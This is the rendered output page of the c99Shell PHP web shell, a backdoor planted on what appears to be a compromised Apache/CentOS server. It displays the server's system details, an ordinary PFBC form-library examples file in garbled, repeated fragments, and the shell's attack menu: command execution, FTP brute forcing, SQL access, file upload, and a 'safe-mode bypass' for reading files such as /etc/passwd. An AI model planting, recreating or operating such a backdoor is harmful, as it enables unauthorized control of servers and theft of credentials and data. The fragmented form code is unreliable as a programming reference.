!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/examples/   drwxr-xr-x
Free 52.4 GB of 127.8 GB (41%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     views.php (9.69 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |




In PFBC, views are responsible for converting a form's properties and elements into HTML, CSS, and javascript for the browser to display. There are four views provided in the project's download: SideBySide, Vertical, Inline and Search.

configure(array( "prevent" => array("bootstrap", "jQuery") )); $form->addElement(new Element\Hidden("form", "sidebyside")); $form->addElement(new Element\HTML('SideBySide default')); $form->addElement(new Element\Email("Email Address:", "Email", array( "required" => 1 ))); $form->addElement(new Element\Password("Password:", "Password", array( "required" => 1 ))); $form->addElement(new Element\Checkbox("", "Remember", array( "1" => "Remember me" ))); $form->addElement(new Element\Button("Login")); $form->addElement(new Element\Button("Cancel", "button", array( "onclick" => "history.go(-1);" ))); $form->render(); ?>
configure(array( "prevent" => array("bootstrap", "jQuery") )); $form->addElement(new Element\Hidden("form", "sidebyside")); $form->addElement(new Element\HTML(\'SideBySide default\')); $form->addElement(new Element\Email("Email Address:", "Email", array( "required" => 1 ))); $form->addElement(new Element\Password("Password:", "Password", array( "required" => 1 ))); $form->addElement(new Element\Checkbox("", "Remember", array( "1" => "Remember me" ))); $form->addElement(new Element\Button("Login")); $form->addElement(new Element\Button("Cancel", "button", array( "onclick" => "history.go(-1);" ))); $form->render();'); ?>
configure(array( "prevent" => array("bootstrap", "jQuery") )); $form->addElement(new Element_Hidden("form", "sidebyside")); $form->addElement(new Element_HTML(\'SideBySide default\')); $form->addElement(new Element_Email("Email Address:", "Email", array( "required" => 1 ))); $form->addElement(new Element_Password("Password:", "Password", array( "required" => 1 ))); $form->addElement(new Element_Checkbox("", "Remember", array( "1" => "Remember me" ))); $form->addElement(new Element_Button("Login")); $form->addElement(new Element_Button("Cancel", "button", array( "onclick" => "history.go(-1);" ))); $form->render();'); ?>
configure(array( "prevent" => array("bootstrap", "jQuery", "focus"), "view" => new View\Vertical, "labelToPlaceholder" => 1 )); $form->addElement(new Element\Hidden("form", "vertical")); $form->addElement(new Element\HTML('Vertical')); $form->addElement(new Element\Textbox("Subject", "Subject")); $form->addElement(new Element\Textarea("Comment", "Comment", array( "class" => "span6" ))); $form->addElement(new Element\Button("Post Comment")); $form->addElement(new Element\Button("Cancel", "button", array( "onclick" => "history.go(-1);" ))); $form->render(); ?>
configure(array( "prevent" => array("bootstrap", "jQuery", "focus"), "view" => new View\Vertical, "labelToPlaceholder" => 1 )); $form->addElement(new Element\Hidden("form", "vertical")); $form->addElement(new Element\HTML(\'Vertical\')); $form->addElement(new Element\Textbox("Subject", "Subject")); $form->addElement(new Element\Textarea("Comment", "Comment", array( "class" => "span6" ))); $form->addElement(new Element\Button("Post Comment")); $form->addElement(new Element\Button("Cancel", "button", array( "onclick" => "history.go(-1);" ))); $form->render();'); ?>
configure(array( "prevent" => array("bootstrap", "jQuery", "focus"), "view" => new View_Vertical, "labelToPlaceholder" => 1 )); $form->addElement(new Element_Hidden("form", "vertical")); $form->addElement(new Element_HTML(\'Vertical\')); $form->addElement(new Element_Textbox("Subject", "Subject")); $form->addElement(new Element_Textarea("Comment", "Comment", array( "class" => "span6" ))); $form->addElement(new Element_Button("Post Comment")); $form->addElement(new Element_Button("Cancel", "button", array( "onclick" => "history.go(-1);" ))); $form->render();'); ?>
configure(array( "prevent" => array("bootstrap", "jQuery", "focus"), "view" => new View\Inline, "labelToPlaceholder" => 1 )); $form->addElement(new Element\Hidden("form", "inline")); $form->addElement(new Element\HTML('Inline')); $form->addElement(new Element\Email("Email Address", "Email", array("required" => 1))); $form->addElement(new Element\Password("Password", "Password", array("required" => 1))); $form->addElement(new Element\Checkbox("", "Remember", array("1" => "Remember me"))); $form->addElement(new Element\Button("Login")); $form->render(); ?>
configure(array( "prevent" => array("bootstrap", "jQuery", "focus"), "view" => new View\Inline, "labelToPlaceholder" => 1 )); $form->addElement(new Element\Hidden("form", "inline")); $form->addElement(new Element\HTML(\'Inline\')); $form->addElement(new Element\Email("Email Address", "Email", array( "required" => 1 ))); $form->addElement(new Element\Password("Password", "Password", array( "required" => 1 ))); $form->addElement(new Element\Checkbox("", "Remember", array( "1" => "Remember me" ))); $form->addElement(new Element\Button("Login")); $form->render();'); ?>
configure(array( "prevent" => array("bootstrap", "jQuery", "focus"), "view" => new View_Inline, "labelToPlaceholder" => 1 )); $form->addElement(new Element_Hidden("form", "inline")); $form->addElement(new Element_HTML(\'Inline\')); $form->addElement(new Element_Email("Email Address", "Email", array( "required" => 1 ))); $form->addElement(new Element_Password("Password", "Password", array( "required" => 1 ))); $form->addElement(new Element_Checkbox("", "Remember", array( "1" => "Remember me" ))); $form->addElement(new Element_Button("Login")); $form->render();'); ?>
configure(array( "prevent" => array("bootstrap", "jQuery", "focus"), "view" => new View\Search )); $form->addElement(new Element\Hidden("form", "search")); $form->addElement(new Element\HTML('Search')); $form->addElement(new Element\Search("", "Search", array( "placeholder" => "Search", "append" => '' ))); $form->render(); ?>
configure(array( "prevent" => array("bootstrap", "jQuery", "focus"), "view" => new View\Search )); $form->addElement(new Element\Hidden("form", "search")); $form->addElement(new Element\HTML(\'Search\')); $form->addElement(new Element\Search("", "Search", array( "placeholder" => "Search", "append" => \'\' ))); $form->render();'); ?>
configure(array( "prevent" => array("bootstrap", "jQuery", "focus"), "view" => new View_Search )); $form->addElement(new Element_Hidden("form", "search")); $form->addElement(new Element_HTML(\'Search\')); $form->addElement(new Element_Search("", "Search", array( "placeholder" => "Search", "append" => \'\' ))); $form->render();'); ?>
bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]--